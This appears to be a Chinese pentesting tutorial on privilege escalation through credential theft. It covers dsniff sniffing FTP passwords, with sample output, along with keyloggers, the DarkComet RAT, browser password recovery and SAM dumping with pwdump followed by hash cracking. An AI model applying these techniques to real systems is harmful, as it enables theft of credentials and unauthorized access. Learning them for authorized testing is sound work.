渗透测试之提权:利用抓包嗅探等提权
一、抓包嗅探
1、Windows
• Wireshark
• Omnipeek
- 下载(官网):https://www.liveaction.com/
- OmniPeek_UserGuide:https://mypeek.liveaction.com/elements/mypeek_documentation/manuals/OmniPeek_UserGuide.pdf
• commview(早期XP上主要在用)
• Sniffpass
- 下载:https://www.nirsoft.net/toolsdownload/sniffpass.zip
- Kali安装ftp:https://www.cnblogs.com/z9m8r8/articles/15864297.html
- 开启ftp服务:service pure-ftpd start
2、Linux
• Tcpdump
• Wireshark
• Dsniff
- 和Sniffpass差不多,可以自己安装:apt-get install dsniff
示例:
root@kali:~# dsniff -h Version: 2.4 Usage: dsniff [-cdmn] [-i interface | -p pcapfile] [-s snaplen] [-f services] [-t trigger[,...]] [-r|-w savefile] [expression] root@kali:~# dsniff -i eth0 dsniff: listening on eth0 ----------------- 02/14/22 01:17:19 tcp 10.10.10.131.1071 -> kali.21 (ftp) USER anonymous PASS IEUser@ ----------------- 02/14/22 01:17:25 tcp 10.10.10.131.1072 -> kali.21 (ftp) USER anonymous PASS IEUser@ ----------------- 02/14/22 01:18:55 tcp 10.10.10.131.1074 -> kali.21 (ftp) USER user PASS 123456
二、键盘记录
1、Keylogger
参见:https://www.cnblogs.com/z9m8r8/articles/15864297.html
2、木马窃取
示例(以DarkComet-RAT-5.3.1为例)
如remote desktop:
三、本地缓存密码
1、浏览器缓存的密码
• IE浏览器
• Firefox(Exdit->Prefence)
示例:
2、网络密码
3、无线密码
4、密码还原工具
工具集: https://www.nirsoft.net/password_recovery_tools.html
5、Dump SAM
• Pwdump(可远程执行,通过参数指定相应IP,username等即可)
• /usr/share/windows-binaries/fgdump/
help:
C:\>PwDump.exe -h pwdump6 Version 2.0.0-beta-2 by fizzgig and the mighty group at foofus.net ** THIS IS A BETA VERSION! YOU HAVE BEEN WARNED. ** Copyright 2009 foofus.net This program is free software under the GNU General Public License Version 2 (GNU GPL), you can redistribute it and/or modify it under the terms of the GNU GPL, as published by the Free Software Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THISPROGRAM. Please see the COPYING file included with this program and the GNU GPL for further details. Usage: PwDump.exe [-x][-n][-h][-o output_file][-u user][-p password][-s share] machineName where -h prints this usage message and exits where -o specifies a file to which to write the output where -u specifies the user name used to connect to the target where -p specifies the password used to connect to the target where -s specifies the share to be used on the target, rather than searching for one where -n skips password histories where -x targets a 64-bit host
示例:
Windows下password加密方式为LM-Hash(如:44EF……4EE)与NTLM-Hash(如:32ED……8D4),LM,NTML,NET-NTLM2理解及hash破解:https://www.cnblogs.com/junsec/p/11810703.html
将用户名,密文复制下来,单独存个.pwdump文件,利用Kali中的解密工具解密。
不忘初心,方得始终。
